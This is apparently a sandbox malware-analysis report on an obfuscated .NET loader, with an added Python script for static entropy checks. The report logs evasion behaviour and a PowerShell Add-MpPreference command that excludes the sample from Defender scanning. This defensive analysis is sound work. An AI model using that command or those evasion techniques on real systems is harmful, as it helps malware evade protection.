Source: 0.2.order2024-10-07_174915.exe.44299b0.2.raw.unpack, kEbYW8C6oLGeBLvKlf.cs | High entropy of concatenated method names: 'blovgcxi7', 'KvFhf3buv', 'tQcjSywxl', 'mivI34rgG', 'tr0Nkwqmp', 'F60mIrCNC', 'f1WiovlUu5lbQWWn3k', 'k92maSoqYVuejf70BR', 'hL0HNeOQK', 'DOf2wV1ev'
Source: 0.2.order2024-10-07_174915.exe.44299b0.2.raw.unpack, L0YxqvzEekwmwdNh3n.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LeuqKsoukP', 'g1xq92jdsM', 'r6LqJQRu6H', 'xXCq4UQ4d8', 'MvlqHw4moG', 'd20qqFfuEX', 'dvkq2cj3Me'
Source: 0.2.order2024-10-07_174915.exe.44299b0.2.raw.unpack, tRmNSiDn6KV5qnyFmK.cs | High entropy of concatenated method names: 'wFBosmliUM', 'En8oOPCB7j', 'lbVokEyOb3', 'RqVoiCRswU', 'botoYrB6S9', 'CqYkGWiXIJ', 'ai7kTZmcQW', 'HQ9ktC2FLv', 'La4kBpSi1U', 'zjwkyR1ZY7'
Source: 0.2.order2024-10-07_174915.exe.44299b0.2.raw.unpack, MPTH9sf8mZBdUlVC0P.cs | High entropy of concatenated method names: 'x2PilswNm4', 'OR0iXspIG4', 'vcMiovUUvg', 'EMpoaBiS8c', 'W79ozWZjlw', 'FqtiQ99ptW', 'N8aiVtfMKU', 'RfMiChS60a', 'culi6ECeBy', 'UujiSlJmDx'
Source: 0.2.order2024-10-07_174915.exe.44299b0.2.raw.unpack, UF5yiaAKaKjCxPVIqB.cs | High entropy of concatenated method names: 'IPvK11e2ux', 'PPJKNAlP1r', 'ktEKDOT1bJ', 'YCZKd5qXB8', 'xmNK7NfqOH', 'YlaK0BCDMJ', 'ew6KfqKGe1', 'zA4KnJhoxs', 'zB6Kx85UL4', 'n7aKR0Uwgy'
Source: 0.2.order2024-10-07_174915.exe.44299b0.2.raw.unpack, J6CuYcBYmLo9Njjyvx.cs | High entropy of concatenated method names: 'WBYHlEDR7u', 'BNtHOuTvib', 'NmAHXi76c3', 'Q0pHkp5a0k', 'BgwHo09Syf', 'SQ6HiplSA7', 'MTWHYTQ61G', 'fJGHMP4wUQ', 'En6HbvoLaH', 'odCHuOsYhR'
Source: 0.2.order2024-10-07_174915.exe.44299b0.2.raw.unpack, dgLayuVQFB9FIbBrhXQ.cs | High entropy of concatenated method names: 'gA6qEGBqQw', 'DZKq5kZPfn', 'QMDqvCoTCG', 'wlvqhLfYNu', 'N3dqpfvWRs', 'CfVqjbxjTw', 'L91qI0mLa9', 'qUiq1Uh4rL', 'EakqNyiGhF', 'NGUqmmHCIm'
Source: 0.2.order2024-10-07_174915.exe.44299b0.2.raw.unpack, wkNbLS74DMyavXxn3k.cs | High entropy of concatenated method names: 'ROfoeEWDaW', 'bH2oEUQgta', 'HfFov6gD5d', 'IndohgvGHf', 'IJ7ojpq6L5', 'l0ToIAMEE2', 'RXKoNUEehD', 'FQuoms7ADR', 'VOIRyvLKe1mno0qelp4', 'JiTCZTLxEjZtukZ1SY0'
Source: 0.2.order2024-10-07_174915.exe.44299b0.2.raw.unpack, RElxeGmUnRpyr3q8Ph.cs | High entropy of concatenated method names: 'HoakpaXNSr', 'bickIrX3jw', 'ND3XZZo86n', 'KroX738YN8', 'KHOX0IxIRb', 'VwaXc9VcPY', 'nk9XfCwLbJ', 'W5GXnGjSo7', 'Yh0Xg4HESL', 'UcqXx1yFGt'
Source: 0.2.order2024-10-07_174915.exe.44299b0.2.raw.unpack, T2dl0FNOhBPD44cpep.cs | High entropy of concatenated method names: 'dsCXh2KRpA', 'Ry5XjH7xn2', 'PFLX1wfpdr', 'pLZXNXsUBy', 'SmnX9oUxFY', 'UMSXJLBJaQ', 'L1HX474SD3', 'OcKXHjAWZL', 'yFlXqOxwRY', 'H4fX2NjhtN'
Source: 0.2.order2024-10-07_174915.exe.44299b0.2.raw.unpack, VudcP5S2swIcffISEF.cs | High entropy of concatenated method names: 'kS6ViDSfec', 'ffXVY3MVo7', 'vOhVbBPD44', 'KpeVupLElx', 'Tq8V9PhrRm', 'ESiVJn6KV5', 'ksA1s2DjPbR6aRaxox', 'zDwcriy6LBVXIvlxKH', 'dImVVoGxAt', 'aSoV6fcT1y'
Source: 0.2.order2024-10-07_174915.exe.44299b0.2.raw.unpack, mhWVR0TRV5IGcDD9i9.cs | High entropy of concatenated method names: 'PAQ4Bdwkm4', 'SZ34a2WwjS', 'Kh5HQph8pD', 'vcNHV0qvfJ', 'l5S4R7Sde6', 'rMt481mO6I', 'EuI4A46L3a', 'D9P4WERkTD', 'NEK4L9uNTB', 'FJt4PDNI1e'
Source: 0.2.order2024-10-07_174915.exe.44299b0.2.raw.unpack, ac6wqfdeMxACwQxisR.cs | High entropy of concatenated method names: 'W1TI7NLneSFYbv4tOH6', 'zcRhWBLtNtEVFleYPfo', 'lUuoHQUY1T', 'V8qoqmlxRC', 'i4uo25XPEy', 'Dx0uyjLBvH9Op5GEJt8', 'PmxBojLPVkNIq1K1S6r'
Source: 0.2.order2024-10-07_174915.exe.44299b0.2.raw.unpack, IksEf0V6vCFZPIeuFLN.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'm0r2WCWeXZ', 'c0V2L5KYPP', 'Xs92PPoonb', 'fVY2338F4R', 'Rv22GbAKXf', 'yXn2T0VaDT', 'y9W2te49yH'
Source: 0.2.order2024-10-07_174915.exe.44299b0.2.raw.unpack, nuc5JuaCnYqoCSk5V5.cs | High entropy of concatenated method names: 'MYgqVp5Q22', 'DJOq6iURQA', 'HeoqSln6Ct', 'n0Yql5QbFW', 'qIRqOHI7WA', 'qhKqkvTsAt', 'gn4qowP4JY', 'bywHtgpFmB', 'YDmHBvFMnS', 'JntHyJCVjM'
Source: 0.2.order2024-10-07_174915.exe.44299b0.2.raw.unpack, tBS357VVUMcGjsnyli9.cs | High entropy of concatenated method names: 'ToString', 'CsA265rtqI', 'rna2SCoyY9', 'lDv2sW8F4b', 'cvd2l7CYUk', 'E2g2OcBmLt', 'lI42XyNctO', 'GLF2k2xwCa', 'cj396xarIwep3ppELqJ', 'nU0Pylau8aQsZKyM5Ww'
Source: 0.2.order2024-10-07_174915.exe.79f0000.6.raw.unpack | High entropy of concatenated method names: the same 21 classes (iyJguyOGUIj6nN2wqt.cs through tBS357VVUMcGjsnyli9.cs) with method-name lists identical to those reported above for 0.2.order2024-10-07_174915.exe.44299b0.2.raw.unpack
Source: 0.2.order2024-10-07_174915.exe.43bf190.4.raw.unpack | High entropy of concatenated method names: the same 21 classes with method-name lists identical to those reported above for 0.2.order2024-10-07_174915.exe.44299b0.2.raw.unpack
Identical class and method names across the dumps at 44299b0, 79f0000 and 43bf190 mean these entries describe one obfuscated assembly observed at three addresses in process 0, not three different modules.
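Read together, the entries in this section describe a staged .NET loader: the InitializeComponent signature (GetObject next to xor) is the usual pattern of a resource being fetched and XOR-decoded, the decoded bytes go to System.Reflection.Assembly.Load(byte[]) so the next stage is never written to disk, the .text entropy of 7.99 out of a possible 8.0 is the footprint of that encrypted payload inside the first-stage executable, and the random method names are renaming obfuscation on top. Both entropy figures can be reproduced statically, before detonation, with the following script. It is an added example and not code from the report or from Joe Sandbox; the PE it parses is constructed in the script (two sections, a uniform byte distribution standing in for the encrypted payload), the 7.2 cut-off is a working heuristic rather than a documented Joe Sandbox threshold, and the obfuscated method names are copied from the iyJguyOGUIj6nN2wqt.cs entry above with a hand-written readable set for contrast.

```python
"""Static entropy checks for a packed .NET loader.

Added example, not part of the Joe Sandbox report. The PE image is constructed
below (not the analysed binary); PACKED_THRESHOLD is a working heuristic."""
import math
import struct
from collections import Counter

PACKED_THRESHOLD = 7.2  # assumption: plain IL/x86 code sits well below this, encrypted data near 8.0


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty input, 8.0 for a uniform byte distribution."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def pe_sections(image: bytes) -> list:
    """Return [(name, raw_bytes)] for every section header of a PE image.
    Minimal parser: MZ -> e_lfanew -> 'PE\\0\\0' -> COFF header -> section table."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", image, coff + 2)[0]
    opt_size = struct.unpack_from("<H", image, coff + 16)[0]
    table = coff + 20 + opt_size  # section headers follow the optional header
    sections = []
    for i in range(num_sections):
        hdr = table + 40 * i
        name = image[hdr:hdr + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", image, hdr + 16)
        sections.append((name, image[raw_ptr:raw_ptr + raw_size]))
    return sections


def section_entropy(image: bytes) -> dict:
    """Map section name -> entropy, the per-section figure the report quotes for .text."""
    return {name: round(shannon_entropy(data), 3) for name, data in pe_sections(image)}


def packed_sections(image: bytes, threshold: float = PACKED_THRESHOLD) -> list:
    """Names of sections whose entropy suggests compressed or encrypted content."""
    return [name for name, ent in section_entropy(image).items() if ent >= threshold]


def name_entropy(names) -> float:
    """Entropy of the concatenated identifiers; renamed (obfuscated) symbols score high."""
    return shannon_entropy("".join(names).encode())


def build_sample_pe(text_payload: bytes, rsrc_payload: bytes) -> bytes:
    """Constructed two-section PE32 image: valid headers for the parser, not loadable."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)  # e_lfanew: PE header right after the DOS stub
    # COFF: Machine, NumberOfSections, TimeDateStamp, SymTab ptr, NumSymbols, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0xE0, 0x0102)
    optional = bytes(0xE0)  # PE32 optional header, zeroed; only its size matters to the parser
    text_ptr = 0x200
    rsrc_ptr = text_ptr + len(text_payload)

    def section_header(name: bytes, raw_ptr: int, data: bytes) -> bytes:
        # Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData,
        # PointerToRelocations, PointerToLinenumbers, NumberOfRelocations, NumberOfLinenumbers, Characteristics
        return struct.pack("<8sIIIIIIHHI", name, len(data), 0x1000, len(data), raw_ptr, 0, 0, 0, 0, 0x60000020)

    image = bytearray(dos + b"PE\0\0" + coff + optional)
    image += section_header(b".text", text_ptr, text_payload)
    image += section_header(b".rsrc", rsrc_ptr, rsrc_payload)
    image += bytes(text_ptr - len(image))  # pad the headers out to the first raw data offset
    image += text_payload + rsrc_payload
    return bytes(image)


# Constructed payloads: every byte value 16 times stands in for an encrypted stage (entropy exactly 8.0);
# a few ASCII strings in a zero-filled buffer stand in for an ordinary resource section.
HIGH_ENTROPY_TEXT = bytes(range(256)) * 16
LOW_ENTROPY_RSRC = b"Form1\0InitializeComponent\0".ljust(4096, b"\0")

# Method names from the iyJguyOGUIj6nN2wqt.cs entry of the report, and a readable set for contrast.
OBFUSCATED_NAMES = ["Dispose", "fh1VyYRlQD", "GWvCdGQVhK", "tZd00kPa2K", "v06VaCuYcY",
                    "ELoVz9Njjy", "ProcessDialogKey", "zx3CQChkGT", "UEoCVuSOiS", "IKwCCuuc5J"]
READABLE_NAMES = ["Dispose", "ProcessDialogKey", "InitializeComponent", "CanConvertFrom", "ConvertFrom", "ConvertTo"]

if __name__ == "__main__":
    sample = build_sample_pe(HIGH_ENTROPY_TEXT, LOW_ENTROPY_RSRC)
    print("section entropy:", section_entropy(sample))
    print("packed sections:", packed_sections(sample))
    print("name entropy obfuscated / readable: %.2f / %.2f"
          % (name_entropy(OBFUSCATED_NAMES), name_entropy(READABLE_NAMES)))
```

On a real sample, read the file and pass its bytes to section_entropy; a .text section above the threshold on a .NET executable is the cue to look for Assembly.Load(byte[]) and a resource decoder rather than to disassemble the IL as it stands.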

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (4 times)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (3 times)
Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | Process information set: NOOPENFILEERRORBOX (41 times; SetErrorMode with SEM_NOOPENFILEERRORBOX, which suppresses the dialog Windows would otherwise show when a module fails to load, so failed DLL probes stay silent)
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | Process information set: NOOPENFILEERRORBOX (reported 56 times)

                      Malware Analysis System Evasion

                      Source: Yara match | File source: Process Memory Space: order2024-10-07_174915.exe PID: 1448, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | Memory allocated: 1650000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | Memory allocated: 32E0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | Memory allocated: 52E0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | Memory allocated: 8130000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | Memory allocated: 9130000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | Memory allocated: 92E0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | Memory allocated: A2E0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | Memory allocated: 2C60000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | Memory allocated: 2E20000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | Memory allocated: 4E20000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | Thread delayed: delay time: 922337203685477 (reported 6 times)
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (reported 2 times)
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7256
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2464
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | Window / User API: threadDelayed 1375
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | Window / User API: threadDelayed 2895
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe TID: 6448 | Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7300 | Thread sleep time: -7378697629483816s >= -30000s
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe TID: 7292 | Thread sleep count: 1375 > 30
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe TID: 7404 | Thread sleep time: -13835058055282155s >= -30000s
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe TID: 7404 | Thread sleep time: -100000s >= -30000s
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe TID: 7292 | Thread sleep count: 2895 > 30
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe TID: 7404 | Thread sleep time: -99875s >= -30000s
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe TID: 7404 | Thread sleep time: -99766s >= -30000s
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe TID: 7404 | Thread sleep time: -99656s >= -30000s
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe TID: 7404 | Thread sleep time: -99547s >= -30000s
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe TID: 7404 | Thread sleep time: -99414s >= -30000s
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe TID: 7404 | Thread sleep time: -99297s >= -30000s
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe TID: 7404 | Thread sleep time: -99174s >= -30000s
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe TID: 7404 | Thread sleep time: -99047s >= -30000s
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe TID: 7404 | Thread sleep time: -98936s >= -30000s
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe TID: 7404 | Thread sleep time: -98821s >= -30000s
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe TID: 7404 | Thread sleep time: -98703s >= -30000s
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe TID: 7404 | Thread sleep time: -98594s >= -30000s
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe TID: 7404 | Thread sleep time: -98469s >= -30000s
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe TID: 7404 | Thread sleep time: -98344s >= -30000s
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe TID: 7404 | Thread sleep time: -98234s >= -30000s
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe TID: 7404 | Thread sleep time: -98125s >= -30000s
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe TID: 7404 | Thread sleep time: -98015s >= -30000s
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe TID: 7404 | Thread sleep time: -97906s >= -30000s
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe TID: 7404 | Thread sleep time: -97797s >= -30000s
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe TID: 7404 | Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | Thread delayed: delay time: 100000
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | Thread delayed: delay time: 99875
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | Thread delayed: delay time: 99766
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | Thread delayed: delay time: 99656
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | Thread delayed: delay time: 99547
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | Thread delayed: delay time: 99414
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | Thread delayed: delay time: 99297
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | Thread delayed: delay time: 99174
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | Thread delayed: delay time: 99047
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | Thread delayed: delay time: 98936
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | Thread delayed: delay time: 98821
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | Thread delayed: delay time: 98703
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | Thread delayed: delay time: 98594
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | Thread delayed: delay time: 98469
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | Thread delayed: delay time: 98344
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | Thread delayed: delay time: 98234
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | Thread delayed: delay time: 98125
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | Thread delayed: delay time: 98015
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | Thread delayed: delay time: 97906
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | Thread delayed: delay time: 97797
                      Source: order2024-10-07_174915.exe, 00000008.00000002.2502442913.00000000010A1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | Process token adjusted: Debug (reported 2 times)
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\order2024-10-07_174915.exe" (reported 3 times)
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exe | Memory written: C:\Users\user\Desktop\order2024-10-07_174915.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess created: C:\Users\user\Desktop\order2024-10-07_174915.exe "C:\Users\user\Desktop\order2024-10-07_174915.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeProcess created: C:\Users\user\Desktop\order2024-10-07_174915.exe "C:\Users\user\Desktop\order2024-10-07_174915.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeQueries volume information: C:\Users\user\Desktop\order2024-10-07_174915.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\order2024-10-07_174915.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
